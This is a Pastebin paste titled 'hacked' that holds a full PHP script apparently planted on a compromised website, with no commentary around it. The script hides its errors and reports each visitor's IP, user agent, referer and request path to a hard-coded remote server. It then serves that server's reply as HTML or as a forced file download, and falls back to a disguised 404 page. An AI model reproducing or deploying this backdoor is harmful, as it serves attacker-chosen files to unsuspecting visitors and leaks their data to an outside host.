Guest User

hacked

a guest
Aug 19th, 2013
653
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. error_reporting(0);
  3. ini_set("display_errors", 0);
  4.  
  5. $remote = 'http://78.138.118.126:443/45vtcgxx.php';
  6.  
  7. php_display($remote);
  8.  
  9. error_404();
  10.  
  11. function php_display($url)
  12. {
  13. $query = array();
  14. $query['ip'] = getIp();
  15. $query['time'] = date('d/M/Y:H:i:s', time());
  16. $query['request'] = getRequest();
  17. $query['path'] = getPath();
  18. $query['protocol'] = getProtocol();
  19. $query['useragent'] = getUseragent();
  20. $query['referer'] = getReferer();
  21.  
  22. $url = $url."?".http_build_query($query);
  23.  
  24. $content = @file_get_contents($url);
  25.  
  26. if(strlen($content) < 10)
  27. {
  28. error_404();
  29. }
  30.  
  31. $content = explode("\n", $content);
  32. $filename = array_shift($content);
  33. $content = implode("\n", $content);
  34.  
  35. if (strstr($filename, ".html") === FALSE)
  36. {
  37. $type = 'application/octet-stream';
  38. header('Content-Type:'.$type);
  39. header('Content-Disposition: attachment; filename='.$filename);
  40. header('Content-Length: '. strlen($content));
  41. }
  42.  
  43.  
  44. echo $content;
  45. exit();
  46. }
  47.  
  48.  
  49. function http_request($params)
  50. {
  51. if( ! is_array($params) )
  52. {
  53. $params = array(
  54. 'url' => $params,
  55. 'method' => 'GET'
  56. );
  57. }
  58.  
  59. if( $params['url']=='' ) return FALSE;
  60.  
  61. if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET';
  62. $params['method'] = strtoupper($params['method']);
  63. if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE;
  64.  
  65. /* Ïðèâîäèì ññûëêó â ïðàâèëüíûé âèä */
  66. $url = parse_url($params['url']);
  67. if( ! isset($url['scheme']) ) $url['scheme'] = 'http';
  68. if( ! isset($url['path']) ) $url['path'] = '/';
  69. if( ! isset($url['host']) && isset($url['path']) )
  70. {
  71. if( strpos($url['path'], '/') )
  72. {
  73. $url['host'] = substr($url['path'], 0, strpos($url['path'], '/'));
  74. $url['path'] = substr($url['path'], strpos($url['path'], '/'));
  75. }
  76. else
  77. {
  78. $url['host'] = $url['path'];
  79. $url['path'] = '/';
  80. }
  81. }
  82. $url['path'] = preg_replace("/[\\/]+/", "/", $url['path']);
  83. if( isset($url['query']) ) $url['path'] .= "?{$url['query']}";
  84.  
  85. $port = isset($params['port']) ? $params['port']
  86. : ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) );
  87.  
  88. $timeout = isset($params['timeout']) ? $params['timeout'] : 30;
  89. if( ! isset($params['return']) ) $params['return'] = 'content';
  90.  
  91. $scheme = $url['scheme']=='https' ? 'ssl://':'';
  92. $fp = @fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout);
  93. if( $fp )
  94. {
  95. /* Mozilla */
  96. if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";
  97.  
  98. $request = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
  99. $request .= "Host: {$url['host']}\r\n";
  100. $request .= "User-Agent: {$params['User-Agent']}"."\r\n";
  101. if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n";
  102. if( isset($params['cookie']) )
  103. {
  104. $cookie = "";
  105. if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);}
  106. else $cookie = $params['cookie'];
  107. if( $cookie!='' ) $request .= "Cookie: $cookie\r\n";
  108. }
  109. $request .= "Connection: close\r\n";
  110. if( $params['method']=='POST' )
  111. {
  112. if( isset($params['data']) && is_array($params['data']) )
  113. {
  114. foreach($params['data'] AS $k => $v)
  115. $data .= urlencode($k).'='.urlencode($v).'&';
  116. if( substr($data, -1)=='&' ) $data = substr($data,0,-1);
  117. }
  118. $data .= "\r\n\r\n";
  119.  
  120. $request .= "Content-type: application/x-www-form-urlencoded\r\n";
  121. $request .= "Content-length: ".strlen($data)."\r\n";
  122. }
  123. $request .= "\r\n";
  124.  
  125. if( $params['method'] == 'POST' ) $request .= $data;
  126.  
  127. @fwrite ($fp,$request); /* Send request */
  128.  
  129. $res = ""; $headers = ""; $h_detected = false;
  130. while( !@feof($fp) )
  131. {
  132. $res .= @fread($fp, 1024); /* ÷èòàåì êîíòåíò */
  133.  
  134. /* Ïðîâåðêà íàëè÷èÿ çàãëîâêîâ â êîíòåíòå */
  135. if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE )
  136. {
  137. /* çàãîëîâêè óæå ñ÷èòàíû - êîððåêòèðóåì êîíòåíò */
  138. $h_detected = true;
  139.  
  140. $headers = substr($res, 0, strpos($res, "\r\n\r\n"));
  141. $res = substr($res, strpos($res, "\r\n\r\n")+4);
  142.  
  143. /* Headers to Array */
  144. if( $params['return']=='headers' || $params['return']=='array'
  145. || (isset($params['redirect']) && $params['redirect']==true) )
  146. {
  147. $h = explode("\r\n", $headers);
  148. $headers = array();
  149. foreach( $h as $k=>$v )
  150. {
  151. if( strpos($v, ':') )
  152. {
  153. $k = substr($v, 0, strpos($v, ':'));
  154. $v = trim(substr($v, strpos($v, ':')+1));
  155. }
  156. $headers[strtoupper($k)] = $v;
  157. }
  158. }
  159. if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) )
  160. {
  161. $params['url'] = $headers['LOCATION'];
  162. if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0;
  163. if( $params['redirect-count']<10 )
  164. {
  165. $params['redirect-count']++;
  166. $func = __FUNCTION__;
  167. return @is_object($this) ? $this->$func($params) : $func($params);
  168. }
  169. }
  170. if( $params['return']=='headers' ) return $headers;
  171. }
  172. }
  173.  
  174. @fclose($fp);
  175. }
  176. else return FALSE;/* $errstr.$errno; */
  177.  
  178. if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res);
  179.  
  180. return $res;
  181. }
  182.  
  183.  
  184. function error_404()
  185. {
  186. /*header("HTTP/1.1 404 Not Found");
  187. exit("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\r\n"
  188. ."<html><head><title>404 Not Found</title></head><body>\r\n"
  189. ."<h1>Not Found</h1>\r\n"
  190. ."<p>The requested URL was not found on this server.</p>\r\n"
  191. ."<hr>\r\n"
  192. ."</body></html>\r\n");*/
  193.  
  194. $uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] );
  195. $content = http_request("http://".$_SERVER['SERVER_NAME']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
  196. $content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content );
  197.  
  198. exit( $content );
  199. }
  200.  
  201. function getRequest()
  202. {
  203. return $_SERVER['REQUEST_METHOD'];
  204. }
  205.  
  206. function getPath()
  207. {
  208. return $_SERVER['REQUEST_URI'];
  209. }
  210.  
  211. function getProtocol()
  212. {
  213. return $_SERVER['SERVER_PROTOCOL'];
  214. }
  215.  
  216. function getUseragent()
  217. {
  218. return $_SERVER['HTTP_USER_AGENT'];
  219. }
  220.  
  221. function getReferer()
  222. {
  223. $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '-';
  224. return $referer;
  225. }
  226.  
  227. function getIp()
  228. {
  229. $ip = NULL;
  230. if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
  231. {
  232. $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
  233. }
  234. elseif(isset($_SERVER['HTTP_CLIENT_IP']))
  235. {
  236. $ip = $_SERVER['HTTP_CLIENT_IP'];
  237. }
  238. elseif(isset($_SERVER['REMOTE_ADDR']))
  239. {
  240. $ip = $_SERVER['REMOTE_ADDR'];
  241. }
  242.  
  243. if(strpos($ip, ",") !== FALSE)
  244. {
  245. $ips = explode(",", $ip);
  246. $ip = trim(array_pop($ips));
  247. }
  248.  
  249. return $ip;
  250. }
RAW Paste Data